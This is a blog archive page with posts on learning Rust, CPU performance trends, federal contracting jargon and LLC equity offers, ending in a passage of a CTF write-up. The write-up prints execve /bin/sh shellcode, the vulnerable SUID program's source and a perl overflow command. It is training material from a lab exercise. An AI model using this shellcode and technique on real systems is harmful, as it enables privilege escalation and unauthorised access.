This one should be a review, you can use iterators (in the form of for-loop ranges), and exponentiation isn’t necessary if you just want to do squares:

let somevalue = 123;
let mut square;
square = somevalue * somevalue;

8: Sum of Multiples

Another review challenge. Tests you again on using iterators, and the modulus operator (“is a multiple of x” is synonymous with “is cleanly divisible by x”). You might use nested loops, or maybe something fancier like closures. I think this post is long enough without addressing that concept.

9: Grains, and the panic macro

Back on exercise 2 we learned how to do exponentiation in Rust, so that’s half of this challenge. The other hint is that the unit tests are testing for error conditions indicated by “panic.” The way to panic in Rust is via the panic macro:

if s < 1 || s > 64 {
	panic!("Square must be between 1 and 64");
}

10: Hamming, unwrap, and the Result type

And finally (for now), we learn how to multiplex a return value and an error condition into one type, Result.

If we choose the return value for our function to be -> Result<i32, &'static str> then we are declaring that we might return either Ok(123) or Err("Something went wrong").

Some of the unit tests are checking to see if the returned condition is an error of any kind: .is_err(). Using Err() satisfies that check.

Rust Initial Impressions

So after getting beyond “Hello world” and trying a few exercises, my initial impressions of Rust as a language are that its strictness is its defining characteristic. You could even say it’s a pain, honestly, not what I could call a joy to work in (although speaking ill of Rust invites the fans to show up and blame you for failing to love it). The payoff doesn’t have to be rapid prototyping joy, though, it just has to be the more secure code that you are ostensibly creating by being so strict and explicit about everything. That’s okay too.

The Good The Bad
Cargo build tool The official documentation for Rust’s language and standard library
Passionate community Condescending comments like “I can tell you’re an imperative language guy” when you don’t use closures
rustfmt for automated code style enforcement (cargo fmt) Learning curve for the errors emitted by the Rust compiler
Rust can be debugged with rust-lldb or rust-gdb and this mostly works within VS Code Your errors will all be compile-time anyway, for better or worse
Expressive method names like .is_alphabetic() are a welcome improvement to C standard lib Any time you have to use strings (String vs str, string concatenation, etc.) you will wonder if Rust will ever catch on

27 Feb 2017, 13:06

A Look at the Rust Programming Language

Where to Find More Execution Performance

Moore’s Law is just about done. It once described a trend of transistor count doubling every 24 months (enabled by increasing the density of transistors by making them ever-smaller). Now:

Between the introduction of 65 nm and 45 nm chips, about 23 months passed. To get from 45 nm to 32 nm took about 27 months, 28 months to go down from there to 22 nm and 30 months to shrink to the current 14 nm process. And that’s where Intel has been stuck since September 2014.

Intel might release 10nm scale chips in late 2017, which would mean that they worked 36-40 months in order to shrink from 14nm to 10nm scale. In other words, the most recent density doubling (the shrink from 22nm to 10nm), by the time it happens, will have taken over 5 years. The next doubling is likely to take at least that long, assuming the multiple breakthroughs required to do so can even be achieved. 10nm is already fairly close to the atomic scale: ~45 silicon atoms across (one atom: 0.22nm). One of the obstacles at this scale to be addressed is quantum tunneling, not that I pretend to understand it.

Of course, Moore’s Law can be satisfied one other way without changing density, which is to simply use bigger and bigger processor dies. You may have seen charts showing that transistor count continues to increase on schedule with Moore’s Law, but this is only true for dedicated GPUs and high-end server CPUs, which are already up against cost practicality limits due to these die sizes.

Even if we were still on track for Moore’s Law, increasing transistor counts alone have provided diminishing returns as of late. Recent density increases have mainly just served to reduce power draw and to make more space on the CPU die dedicated to graphics rendering (an ideal parallelizable task). Tech being an optimistic culture makes it slow to acknowledge the obvious truth here: CPU cores aren’t getting significantly faster. Unless your work is on a mobile device or can be delegated to a GPU or server farm, your only performance upgrades since 2010 have been I/O-related ones.

Granted, transistor density improvements have continued to increase CPU power efficiency. But I have a Intel “Core i7” (2.66 GHz i7-620M, 2-core) laptop that will turn 7 years old in a couple of months, and today’s equivalent CPUs still offer only a marginal performance improvement for tasks that aren’t 3D graphics. The equivalent CPU today, the Intel “Core i7” (2.7GHz i7-7500U, 2-core), has single-threaded performance only about 60% better than my CPU from 7 years ago. Not enough to make me throw out my old laptop.

All of this background is to make my point, which is that the next performance leap has to come from improved software, rather than relying on “free” improvements from new hardware. A few software methods for achieving a generational improvement in performance might be:

  • Parallelism
  • Optimizing compilers
  • Moving tasks from interpreted languages back to compiled languages

All of these things are already happening, but it’s the last one that I’m interested in most.

Parallelism

Parallelism has brought great performance improvements in graphics, “AI,” and large data set processing (so-called “Big Data”), and is the reason why GPUs continue to march forward in transistor count (although, again, check out those increasing die sizes; those are approaching their own limits of practicality). The problem with parallelism, though, is that while there are some workloads that are naturally suited to it, others aren’t and never will be. Sometimes, computing Task B is dependent on the outcome of Task A, and there is just no way to split up Task A. Even when parts of a task can be parallelized, there are swiftly diminishing returns to adding more cores, as described by Amdahl’s Law. What parallelized processing does scale well for is large data sets, although the home user is not typically handling large data sets, and won’t directly benefit from this kind of parallelism.

Optimizing Compilers

Here are Daniel J Bernstein’s 2015 slides about the death of “optimizing compilers,” or rather, that despite all the hype about them, we are still manually tuning the performance critical portions of our programs. The optimizing compilers’ optimization of non-critical code portions is irrelevant, or at least not worth the effort put into optimizing compilers. It appears that a compiler to generically optimize any code as well as an expert human could, would require something like a general AI with a full contextual understanding of the problem being solved by the code. Such a thing doesn’t exist, and is not on the horizon.

Better (Safer) Compiled Languages

C and C++ never really left us, and neither have all of the inherent memory errors in code programmed in C and C++. That includes Java, whose runtime is still written in C. The Java runtime has been the source of many “Java” security issues over the years, to the point where the Java plug-in was effectively banned from all web browsers. Despite that, the rest of the browser is also written in C and C++, and just as prone to these problems. There hasn’t been any viable alternative but to try to sandbox and privilege-reduce the browser, because any safer language is too slow.

The real cost of C and C++ ’s performance is their high maintenance burdens: coding in them means always opening up subtle concurrency errors, memory corruption bugs, and information leak vulnerabilities. This is why simply improving the C++ standard library and adding more and more features to the language has not altered its basic value proposition to developers, who have already fled to “safe” languages.

That’s where the experimental language, Rust, comes in. It’s a compiled systems programming language with performance on par with (or better than) C++, but with compile-time restrictions on memory management and concurrency that should prevent entire classes of bugs. At some point in the next 5 years, I predict that we will see Rust (or something like it, whether it’s Swift or some new really strict C++ compiler) slowly start replacing C/C++ wherever performance and security are both primary concerns. It’s exciting to think that a well-designed compiled language could solve most of the reasons for the ~20-year flight away from native code programming.

Having played with Rust for a few days, I can say it will certainly not replace Python for ease of development, but it’s a really interesting disruptor for anyone writing native code. Security researchers should also take notice.

Rust Programming Language

For what it’s worth, Rust was the “Most Loved Programming Language of 2016 in the Stack Overflow Developer Survey.” It enforces memory management and safety at compile-time. Some memory safety features of the language include:

  • Rust does not permit null pointers or dangling pointers. Since pointers are never NULL, you can always safely dereference a pointer.

  • There are no “void” pointers.

  • Pointers can not be downcast to a more specific type, only upcast to a more generic type. If generic data structures are needed, you use parameterized types/functions.

  • Variables can be allocated on the heap and are cleaned up without the need for “free” or “delete.”

  • Concurrent-access race conditions are impossible, because every piece of data is either:

    • mutable (reference from a single “owner” at a time, owner re-assigned if needed) OR
    • immutable (multiple references can exist)

(there can be only one mutable reference, or an aribtrary number of immutable references to the same allocation, but never both [credit: @vitiral])

If you just wanted a statically typed, compiled language with a modern standard library that is easy to extend, you could also choose Go. But Rust claims to be all of that, plus faster and safer. Rust will work in embedded devices and other spaces currently occupied by C/C++; Go will not. Some think Rust is just fundamentally better, but I am not qualified to judge that.

Rust and parallelism

Rust makes parallelization an integral part of the language, with support for all of the necessary parallel programming primitives. Parallelized versions of various programming constructs can be swapped in without changing your existing code. This is possible because the Rust language forces the programmer to specify more about how data will be used, which prevents race conditions at runtime by turning them into errors at compile time, instead.

Concept of “Ownership” in Rust

The major innovation of the Rust language (inspired by a prior language, “Cyclone”) is that its compiler, in order to do memory management and prevent race conditions at compile time, tracks “ownership” of all variables in the code. Once a variable is used (like in a call to a function) it is considered to be passed to a new “owner,” and using it in a subsequent statement is illegal and would trigger a compiler error. If the developer’s intention was to copy-on-use (“clone”), they must specify that in their code. For certain simple data types (integers, etc.), they are automatically copied-on-use without any explicit intent from the developer. Another aspect of ownership in Rust is that all variables are (what in C/C++ would be called) const, by default. In Rust, if you want a variable to be mutable, it has to be explicitly stated in the declaration.

This concept is the foundation of the Rust language. It’s hard to grasp at first, since it is very different from programming in C or C++, or even Java. The most detailed explanation of Rust ownership that I’ve seen is this article by Chris Morgan, but to actually learn the concept I’d recommend starting with this 25 minute video by Nikolas Matsakis.

At first, it seems like another mental burden on the programmer, but adopting this concept of memory management means the programmer is also relieved of having to manage memory with carefully paired calls to malloc() and free() (or new and delete). “So what, isn’t this what you get with C# or Java?” Not quite: those languages use a Garbage Collector to track references to data at runtime, which has an inherent performance overhead and whose “stop-the-world” resource management can be inconsistent and unpredictable. Rust does it in the language, at compile time. So, without the use of a Garbage Collector, Rust makes memory management (and concurrent access to data) safe again.

Rust is a Drop-In Replacement for C

Just like C/C++, Rust can be coupled to Python or any other language with a native interface, in order to leverage the strengths of both. And, debugging Rust programs is officially supported by GDB. This works the other way around too, i.e., you can build a Rust program on top of native code libraries written in C/C++. Mozilla is even working on a web browser engine in Rust, to replace Gecko, the Firefox engine. Benchmarks in 2014 showed a 300% increase in performance vs Gecko, and by early 2016, it was beating Webkit and Chrome as well (at least in some hand-picked benchmarks where they leverage Rust’s ease of parallelism to delegate a bunch of stuff to the GPU). If you’re interested in the details of how Rust can improve browser engines, Mozilla wrote about it here. Buried in the paper is a detail that they seem to have downplayed elsewhere, though: the new browser engine is actually still bootstrapped by an existing codebase, so it’s still 75% C/C++ code. On the other hand, that also goes to show how Rust integrates well with C/C++.

Rust has a Package Manager, which is also its Build Tool

Makefiles are impossible to write and debug, and basically you’re always just copy-pasting a previous Makefile into the new one, or hoping an IDE or build tool abstracts away all that crap for you, which is why this wheel has been reinvented many times. I generally don’t have a favorite build tool (they’re all bad), since it always seems to come down to a manual troubleshooting cycle of acquiring all the right dependencies. The worst is having a build system that is a big layer cake of scripts on top of XML on top of Makefiles.

Rust package manager “Cargo” simply uses TOML files to describe what a Rust project needs in order to build, and when you build with Cargo, it just goes out and gets those dependencies for you. Plus, the packages are served from Crates.io, so if you’re keeping score that’s a double tech hipster bonus for using both the .io domain and TOML.

Installation and Hello World

Assuming you’re using MacOS like me (there is plenty of info out there already for Windows and Linux users) and you have Homebrew:

    $ brew install rust
    $ rustc --version
    rustc 1.15.0

You probably want an editor with Rust syntax highlighting and code completion. These are your choices. I went with Visual Studio Code, aka VS Code. It’s not what I’d call an IDE, and I still haven’t gotten it to integrate with a debugger, but hopefully JetBrains will step up and make a Rust IDE – once there is a market for it.

VS Code doesn’t understand Rust out of the box. Launching VS Code, hit Command-P to open the in-app console:

ext install vscode-rust
(install the top search result, should be the extension by kalitaalexey)

Optionally, you can install a GDB/LLDB integration layer to attempt to debug from VS Code (in theory – YMMV but I haven’t gotten it to work for LLDB with C++ yet, let alone Rust):

ext install webfreak.debug
(install the top search result)

Notice in the bottom right: “Rust tools are missing” … click install. It will invoke Cargo (the Rust package manager) to download, compile, and install more of the Rust toolchain for you: racer, rustfmt, rustsym, etc. And all of the dependencies for those. Go have a coffee, this will take a while. About 18 minutes on my system.

Finally: close VS Code, and open up Terminal so we can put all these new Rust binaries on your $PATH.

$ open -a /Applications/TextEdit.app ~/.bash_profile

Add the line export PATH="/Users/yourusername/.cargo/bin:$PATH" and save.

Open a new instance of VS Code. It should no longer tell you that Rust tools are missing. 👍🏻

Test the environment with a Hello World in Rust! Save the following as hello.rs:

fn main() {
    println!("Hello World!");
}

Open “View -> Integrated Terminal.” From here you can compile by hand like a peasant, because VS Code isn’t an actual IDE.

bash-3.2$ cd ~/Desktop
bash-3.2$ rustc hello.rs
bash-3.2$ ./hello
Hello World!

But for a realistic scenario, we could have also used Cargo to both create a new Rust project and then build it.

In a future post, I will share my thoughts on what it’s like to try to actually write a program in Rust.

Rust References

21 Feb 2017, 13:45

Government Contracting Jargon

Whether you’re just starting work for a business that does federal contracting, or if you’ve been doing it for a long time, you know that the contracting and administrative side of the business speaks its own language. Mostly this is the language of federal acquisition. Acquisition, here, refers to the process of the government acquiring a product or service from the private sector – also known as procurement. It is defined and codified by Congress in a regulation called the Federal Acquisition Regulation (FAR).

Jargon is nowhere near the hardest part of administrating or operating a successful contracting business, but it is one intimidating factor that can prevent the tech experts working for federal contractors from participating in the leadership roles at their company. So if you get familiar with the terminology of the bureaucracy, you can at least get that out of the way and focus on the difficult parts, like the business plan and the customer relationships. In my experience, those who’ve mastered and understood these concepts seem to have no interest in sharing their knowledge. It’s almost as if keeping the technical staff in the dark about the administrative functions is what justifies the rigid boss/employee dichotomy.

Codes that Register A Business with the Government

DUNS Number

A credit bureau for businesses known as Dun & Bradstreet assigns these unique nine-digit identifiers. A DUNS number is used to establish a business credit file, which is often referenced by lenders and potential business partners to help predict the reliability and/or financial stability of the company in question. DUNS stands for “Data Universal Numbering System” but really it’s just a convenient backronym to incorporate the law firm’s name. You have to have a DUNS number to bid for federal government contracts. It’s free to obtain one, unless you want it expedited.

EIN: Employer Identification Number

When you register a company with the IRS for tax-filing purposes, you receive one of these EINs. If you’ve ever received a W-2 statement as an employee, you’ve seen that the EIN for your employer is on the form.

SAM: System for Award Management / CAGE Code

SAM is a fairly new system that replaces several redundant systems that existed previously. Any company that would like to do business with the federal government, or needs to report subcontract information, must register on the System for Award Management (SAM). So after you have an EIN and a DUNS, you can go to the SAM and register, after which you will receive a CAGE Code (Commercial and Government Entity). This is yet another unique identifier for your business, required for any company that does federal contracting. Applying for a CAGE code also requires knowing your NAICS code (see below) that categorizes what your business does. A company’s SAM status has to renewed every year, but at least there’s no fee.

Optional and for small businesses only: there’s an additional system to be found by government procurement officers, called the DSBS. When registering with the SAM system, you can also create a DSBS profile through there.

Codes that Categorize Product & Service Offerings

In an attempt to standardize purchases, government has come up with multiple (redundant) classification codes. In other words, they’ve attempted to create a taxonomy of commoditized goods and services. Like with all taxonomic follies, the inherent assumption here is that all offerings from businesses can be classified as this or that, or that the whole exercise is useful for anything. In this case, it is supposed to assist government buyers in finding sellers (although this is not really how they find sellers) and it is might assist sellers in determining who is buying a particular thing (although that too does not really work in practice). The more specialized and hi-tech your offering, the less useful it is to try to fit it into a code classification.

So, choosing your own category codes is dicey, and you should not choose them based purely on your own judgment, but rather what your intended customers are purchasing. If you do some reconnaissance on public databases of past contracts, you can check what codes your competitors have used. Those are probably the ones you will use as well.

NAICS Codes

There are over 1200 of these North American Industrial Classification System codes, defined by the Census Bureau or possibly the Office of Management and Budget. This is the categorical bin you’re placing your business in. You’d choose it based on a careful review of what code your customer buys, not which one you think is most appropriate.

PSC: Product Service Codes

These are similar to NAICS codes, but as a categorical bin for the product or service being sold, as opposed to your business itself. There are even more of these: roughly 2300. They are defined by the GSA.

Use these codes for research: find bidding opportunities on FedBizOpps, or find past contracts on the Federal Procurement Data System (and the agencies that awarded them). You can also find your competition: the Dynamic Small Business Search, enter in your NAICS or PSC codes.

NIGP Codes

NIGP stands for The National Institute of Governmental Purchasing, but it’s just another code for categorizing products and services. This one predates NAICS, and is only relevant at the state and local levels, so we’ll ignore it here.

The GSA Schedule

GSA is the General Services Administration. The “GSA Schedule” is like a collection of pre-negotiated prices, sort of an accelerated buying process for commodity goods and services, where the focus is price. The term itself is a little misleading, as there are actually 39 GSA Schedules categorized by products and services, like schedule 70: IT Services.

It requires a cumbersome application process that asks you to provide several years of past-performance, and a commitment to sell at least $25k/year of goods or services through this contracting vehicle. Being on the GSA Schedule seems might be a competitive edge for mid-size or larger businesses. But as a small business you’d probably just subcontract to one of the 20,000 businesses that are on the GSA Schedule.

SIN: Special Item Number

Under a particular GSA schedule, there may be subcategories for more specific goods or services. These are identified by SINs, another GSA-provided identifier. So if you are on Schedule 70 (IT) you might be selling a service under the Cloud SIN (132-40) that applies to cloud services, or if you’re just consulting maybe you’d use the broad “IT Professional Services” SIN (132-51). As of October 2016 there are even a few SINs for cybersecurity services.

Small Business Set-Asides

The federal government has a mandate to deliver 23% of its prime contracts to small businesses. Just being a small business means there are opportunities marked for you, but many entrepreneurs also look to certify under an officially recognized disadvantaged status so that they bid for even more exclusive “set-asides.” Set-asides are federal contracts that restrict bidding to only members of certain qualifying groups. Not only that, but sometimes small businesses can receive sole-source contracts, also known as no-bid contracts.

The Small Business Administration (SBA) is an agency of the federal government set up to provide support to entrepreneurs and small businesses, through loan guarantees and these special “disadvantaged status” programs. The SBA defines most of the disadvantaged-status titles that you see attached to company profiles. “Joe’s Cyber Shop: a Service-Disabled Veteran-Owned Small Business.” There’s at least one other status, Veteran-Owned Small Business, that is certified by the Department of Veterans Affairs rather than the SBA.

8(a) Business Development Program

This program (named for a section of the Small Business Act) is for minority groups. An eligible business needs to apply for this status with the SBA, and be certified. Once certified, the SBA offers specialized business training, counseling, marketing assistance, and high-level executive development.

HUBZone

Historically Underutilized Business Zones (HUBZones). If the company’s principal office and 35% or more of its workforce resides in one of these zones, it can receive this other kind of preferential status. There’s a map of these zones on the SBA site. No it isn’t broken; it just really is that slow. Chances are these are not desirable places to move your headquarters and yourself to, solely for the chance that you might have an edge in competing for contracts. But even if you did relocate, you’ll probably lose the status as soon as you make your first hire. You’ll be competing for highly skilled individuals to work technical contracts, and you’re just not going to find people like that living around a recently closed military base.

Procurement Terms

There are a whole host of terms related to the government’s offering of contract opportunities, and the contracting industry’s pursuit of them. Quickly, here are some common ones:

  • BAA: Broad Agency Announcement. This is how the government solicits for proposals for research and development (specifically). If the government agency is looking for specific products or services rather than basic and/or applied research, then they will issue an RFP instead of a BAA.
  • BD: Business Development. This is a pretty loosely-defined term. If used by an engineer, “BD guy” might be considered an insult. Sometimes BD is proposal-writing, sometimes it is relationship-buidling.

  • COTS: Commercial Off-The-Shelf. This is a term used to refer to anything that can be commercially purchased or is for sale to the general public. Also see GOTS.

  • FPDS: the Federal Procurement Data System. This is a database that is intended to be a single source for government-wide procurement data (information about awarded contracts). It’s a reporting system. What I’ve found is that not all contracts get reported here, so there must be some exceptions. You can use it to recon your competition, but perhaps don’t rely on it too much.

  • GOTS: Government Off-The-Shelf. As opposed to COTS, something that is GOTS is not for sale to the general public, and typically is developed by the technical staff of one federal agency (or an outside source at their direction), for use by them and/or other government agencies. This is rare, compared to COTS.

  • GFP / GFE: Government Furnished Property / Equipment. Any time the government offers its own equipment in order for a contractor to perform a task, it is referred to as GFE. Technically, GFE is a kind of GFP. Another kind of GFP is GFM (Material). You may also see GFI (Information).

  • RFI: Request for Information. This is not a solicitation for proposals, it’s much more preliminary than that. If the government needs more information in order to create a good RFP, then it will put out an RFI. Sometimes the desired response to an RFI is a Capabilities Request: the government occasionally wants to know the available contractors that can perform certain kinds of work. They may use an RFI as a process by which to accept a short (generally 5-10 pages) profile of your company’s offerings and qualifications.

  • RFP: Request for Proposal. When the government knows its problem (not basic or applied research) but wants proposals with approaches and prices, then they put out an RFP.

  • SoW: Statement of Work. There are many formats and templates for what a SoW must include, but basically it is a list of obligations that the contractor states they will fulfill on the contract.

  • WBS: Work Breakdown Structure. This is project manager speak for the work that needs to get done, in outline form. That’s it, it’s an outline. But listen to this pretentious definition they teach in business school! “A hierarchical decomposition of the total scope of work to be carried out by the project team to accomplish the project objectives and create the required deliverables.”

Contract Terms

I’ll make another blog post later about contract types, which is too much to cover here. But there are a few common terms to define up front, related to reading the contracts themselves:

  • CDRL: Contract Data Requirements List. This might be specific to military contracts. Some might pronounce it “see drill.” It is a list of deliverables that the contractor is responsible for producing for the government. It is derived directly from the contractor’s Statement of Work in their proposal.
  • CLIN: Contract Line Item Number. CLINs are specified in the FAR part 4.10. I think for the contractor, they are basically just numbers that identify deliverables. On the government side, it’s part of an accounting and traceability system.
  • CO: Contracting Officer. This is the government person with the authority to enter into, make changes to, or terminate a govnerment contract. In other words, they have been delegated the authority to represent the government in the contracting process.

  • COR: Contracting Officer’s Representative. This is a person who helps the CO administer the contract with the performer. The COR is not authorized to make any commitments or obligations on behalf of the government.

  • COTR: Contracting Officer’s Technical Representative (COTR). A COTR is a particular kind of COR, designated by the CO to be their technical liason. It’s often the case that the CO does not have a sufficient understanding of the specialized work being performed on the contract in order to accurately assess its progress, and this is when they appoint a COTR. Again, the COTR is not authorized to make any commitments or obligations on behalf of the government. Only the CO is.

13 Feb 2017, 23:41

Evaluating Equity as Compensation

The traditional model of entrepreneurship is:

  1. concept
  2. plan
  3. venture funding
  4. exit

It seems like most people just unquestioningly accept that this is the natural sequence of events, but why is it this way? Isn’t there something missing from this? Like what about the focus on the customer, or about actually making a great service or product? If a business is working, why do you need to leave? What’s the rush? Why do you immediately go from borrowing money to looking for a buyer? This sounds more like house flipping than entrepreneurship. Accepting venture capital funding means accepting their short-sighted outsider influence, and this is what creates the pressure for an exit (rather than the creation of a stable, sustainable business).

The frothy market of dollar-chasing VC-backed pump & dump schemes is probably the worst way to try to generate a world-changing technological breakthrough. We live in a world where every problem left worth solving is a difficult multi-disciplinary one that requires long-term-horizon thinking. If you are just planning to make money, you may not care. If you are paying some lip service to making the world a better place, though, this seems like a case of some misaligned values.

What about the technical staff, in all of this? The scientists, engineers, programmers. They get left holding the bag on step 4, that’s what. They get rolled. At best, after “exit,” they have a new management team and a 5-10% retention bonus for a couple of years. More likely, everything they liked about the job culture goes out the window and they get to watch the 2 or 3 founders drive off in their new luxury sport sedans, with a cash cushion that makes them set for life. At worst, the technical staff will get laid off shortly after the acquisition and/or the business will implode.

Most people over the age of 25 have become wise to this trajectory of events. For tech labor, it’s theoretically still a seller’s market (seller, here, being the employee in the employee-employer relationship). So prospective employees naturally want to be paid not just a salary, but to actually feel like they are sitting at the table. High-value employees want to be cut in (to use another poker metaphor). If you as the employer don’t cut them in, science has shown: you will be getting 5% less value out of them than you could be, if you can even hire and retain them in the first place.

Offers of equity to new employees are exceedingly common in venture-capital startup land. But even in government land, it’s not unheard of to work for a company with strong employee-ownership values. SAIC is (was, before its board took its stock public and then the model imploded) one well-known success story, and in the early 2000’s I worked for another lesser-known company that used an identical compensation system (the founders of the two companies were friends, actually, and launched the companies in parallel). I have actually worked under a few different equity models over the years: a fully-employee-owned model (some in stock, some in NQO options), a profit-sharing “equity” model, and a no-equity model.

Business finance is not my specialty, but I believe that we as engineers should not adopt a learned helplessness. Many of us have a disinterest in the topic of money. Yes, equity compensation is complicated – even suspiciously so – and dry. Boring, even crass. But we should take an interest in ourselves, because nobody else will. Don’t accept being exploited. This is about the empowerment of labor vs. capital.

The Open Guide to Equity Compensation is a community project to aggregate information to help improve the financial literacy of people in tech, specifically, to spread the kind of sophistication necessary to evaluate a compensation offer that is either all or partially made in terms of company equity. If you’ve never read this guide, do so now! There is seriously good info there, and you may save yourself from making an expensive mistake.

The Open Guide still has a gap when it comes to LLCs, though, so I will add some wisdom from personal experience. If you plan on working at a small less-established or newly established LLC, and are considering an equity offer:

  • know that LLCs’ equity sharing structure is different from Corporations, and advice on LLC equity is much harder to find, since LLCs are newer and less common than Corporations
  • the equity offer should be in writing, signed
  • the offer should specify the award and vesting timeline. If an option award, it should specify the award price
  • the offer should specify the valuation method
  • the offer should be in percentage terms, not in terms of some malleable unit (fraction with an unknown denominator)
  • the offer should contain no loophole words like “intend to,” but be worded as a commitment, like “shall” or “will”
  • if the equity-sharing plan structure is still TBD, consider the offer worthless

Especially that last bullet, since it supercedes everything else. Once you accept the offer of employment, you lose all leverage. Once you have lost leverage, your “equity” (if you ever get it) will be defined as something worth nearly zero, in a way that most favors the company. Your award of, say, a defined percent of the valuation of the company can be interpreted to mean an option grant to purchase some equity. Remember, it’s not an award if you have to buy it, it has no present value if you have to buy it at-or-above the present value when granted, and it’s not worth anything if you can’t sell it. Check: are you basically buying an illiquid asset with a tax consequence? Is this thing going to pay dividends until you can sell it? And for an LLC, also realize that you might have to give up employee (W-2) status and start paying more taxes on your salary, too.

See, with LLCs, you cannot get stocks, you can only get “membership interest units.” In an LLC, equity might be in the form of Profits Interest Units (not to be confused with profit sharing). “Profit interest” is a junior form of equity in every sense of the term – if you want the Big Boy equity (ownership) in an LLC you want “Capital Interest.” Either way though, unlike a stock, these two kinds of LLC Interests may be restricted in a way that prevents them from being freely transferred. You might have to hold it until the company itself is sold. And there are complicated consequences for taxation and accounting, that all threaten to make them more trouble than they are really worth, especially for small amounts.

Here is a table to help roughly compare LLC equity offers with traditional coporation equity offers.

Equity in a C- or S-Corporation Equity in a LLC (the closest parallel)
Stock Option Profits Interests Units or Options for Capital Interests
Restricted Stock Units (RSU) Capital Interests Units
“Phantom Stock” (Membership Interest) Unit Rights, a.k.a. “Phantom Equity”
Stock Appreciation Rights (SAR), a.k.a. Phantom Stock Option (Membership Interest) Unit Appreciation Rights

The more established an LLC company is, the less attractive a Profits Interest Unit becomes, relative to a Capital Interest Unit. That is because a Profits Interest value is only in the future appreciation of the value of the company, whereas a grant of Capital Interest is an immediate share of the value of the LLC as of the date that the interest is granted. In addition, the longer an employer can drag its feet and delay the award of a Profit Interest Unit, the less value it is to you. That’s why award date, strike price, and vesting schedule are all very important.

If Amazon were an LLC, would you rather be granted – today – a 1% profit interest? Or 1% equity? Amazon is infamously unprofitable, but also enormous. And if it were a profit interest, would you rather have that five years ago, or today? Five years ago obviously: even though Amazon is unprofitable, a PIU represents both profit and appreciation of company valuation, which for Amazon is like a 450% increase.

Also, keep in mind that an LLC can always allocate its gross profit in any given year so as to lower (or eliminate) net profit, disbursing the money in (almost) any way that it sees fit. The management team feels like paying all the profits out as bonuses this year? That comes at the expense of the PIU holders. A company car for the CEO? Sorry PIU holders. If you get a great PIU award and it’s fully vested today, but tomorrow the LLC is sold? Sorry, there hasn’t been any growth in the company value over that period, so your PIUs are worth zero.

Anyway, I hope this has been useful. If you disagree or think I am misinformed, I am open to discussions; find me on Twitter. I encourage everyone to educate themselves using multiple sources, and I don’t claim to be an authority on this subject. In fact, here’s a disclaimer.

Disclaimer

*This blog post and all associated comments and discussion do not constitute legal or tax advice in any respect. The author has prepared this material for informational purposes only, and it is not intended to provide, and should not be relied on for, tax, legal or accounting advice. The author is not a licensed practitioner in taxes, law, or accounting. No reader should act or refrain from acting on the basis of any information presented herein without seeking the advice of counsel in the relevant jurisdiction. The author(s) expressly disclaim all liability in respect of any actions taken or not taken based on any contents of this guide or associated content.

12 Feb 2017, 17:52

Enigma2017 CTF Overflowme Writeup

As mentioned in my last post, I spent some time solving security challenges posted on HackCenter for the Enigma2017 conference. This one (obviously) was to exploit a buffer overflow vulnerability. It was meant to be relatively easy, but sometimes you don’t realize the easiest approach first. I’ll walk through not just the solution, but the things I tried that didn’t work. It was a refresher course in exploitation for me – I’ve spent many years on defense research and needed to brush up again. I know that this is a fast walkthrough, but I don’t want to try to teach every concept here, since it is a rather basic exercise, and many others have already explained them elsewhere. If you’re reading and would like clarification, feel free to hit me up on Twitter.

The Challenge

They provided a web shell (literally a terminal emulator in your browser, at HackCenter.com) to a Linux host, and they even gave some free shellcode, \x31\xC0\xF7\xE9\x50\x68\x2F\x2F\x73\x68\x68\x2F\x62\x69\x6E\x89\xE3\x50\x68\x2D\x69\x69\x69\x89\xE6\x50\x56\x53\x89\xE1\xB0\x0B\xCD\x80. You can disassemble this several ways, but a fast and easy way is someone else’s server running Capstone.js. We observe that it is an execve syscall at the end, and apparently is running /bin/sh to provide a shell. We already have a shell, so there must be something different about this target process they want us to exploit.

    31 C0   xor eax, eax                # eax = NULL
    F7 E9   imul ecx
    50      push eax                    # the NULL that terminates the string
    68 2F 2F 73 68  push 0x68732f2f     # not a pointer! The string: “h//sh”
    68 2F 62 69 6E  push 0x6e69622f     # not a pointer! The string: “h/bin”
    89 E3   mov ebx, esp
    50      push eax                    # the NULL that terminates the string
    68 2D 69 69 69  push 0x6969692d     # the string “h-iii”
    89 E6   mov esi, esp
    50      push eax                    # arguments
    56      push esi                    #	  to
    53      push ebx                    #		execve()
    89 E1   mov ecx, esp
    B0 0B   mov al, 0xb                 # the code number for execve()
    CD 80   int 0x80                    # syscall()

Now let’s take a look at the shell we are given:

$ uname -a
Linux enigma2017 3.16.0-4-amd64 #1 SMP Debian 3.16.39-1 (2016-12-30) x86_64 GNU/Linux
$ pwd
/problems/9ae8cc98f274aa6de77715eb9bdea7ed
$ ls -la
total 24                     
drwxr-xr-x  2 root       root         4096 Jan 27 16:07 .
drwxr-x--x 89 root       root         4096 Jan 27 16:07 ..
-r--r-----  1 hacksports overflowme_0   33 Jan 31 18:57 key
-rwxr-sr-x  1 hacksports overflowme_0 6088 Jan 31 18:57 overflowme
-rw-rw-r--  1 hacksports hacksports    530 Jan 31 18:57 overflowme.c
$ id
uid=1883(myname) gid=1884(myname) groups=1884(myname),1001(competitors)
$ checksec --file overflowme
# ...weirdly, checksec never returns, a bug in HackCenter maybe...
$ cat /proc/sys/kernel/randomize_va_space
2

Notice the permissions for the overlowme binary include the SUID access right flag. When you run this binary, it runs as the user hacksports, who is the owner of key and can read it. The goal here is to run arbitrary code in this process and use it to read key. The given shellcode, executed by overflowme, would provide us a shell where we have the ability to read key.

Notice also the last command, which reads out the ASLR setting: 2. That means that we should expect the OS to randomize the layout of the program’s memory when it runs (both text and data segments, is what 2 means).

What about the source code they’re letting us see?

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include "inspection.h"

void vuln(char *str) {
    char buf[979];
    sprintf(buf, "Hello %s", str);
    puts(buf);
    fflush(stdout);
    return;
}

void be_nice_to_people(){
    gid_t gid = getegid();
    setresgid(gid, gid, gid);
}

int main(int argc, char **argv) {

    if (argc != 2) {
        printf("Usage: %s [name]\n", argv[0]);
        return 1;
    }

    be_nice_to_people();
    vuln(argv[1]);
    return 0;
}

The Vulnerability

This is a stack-based buffer overflow in the sprintf() call. A fixed-length buffer, buf[979] takes a user input of unchecked (and unlimited) length, in the program’s first command-line argument. Since buf is on the stack (as it is a local variable to the function vuln), this is a stack-based buffer overflow.

There are many, many guides out there that explain what happens when you overflow a stack-based buffer on a program that was compiled with absolutely no exploit mitigations: your input overwrites the saved return pointer (also on the stack), and the function epilogue’s RET instruction transfers code execution to the address that is now part of the overflowed input. So, the attacker decides where execution will go: arbitrary code execution.

Proof of the vulnerability:

$ ./overflowme `perl -e 'print "\x30"x982'`

or if you prefer Python:

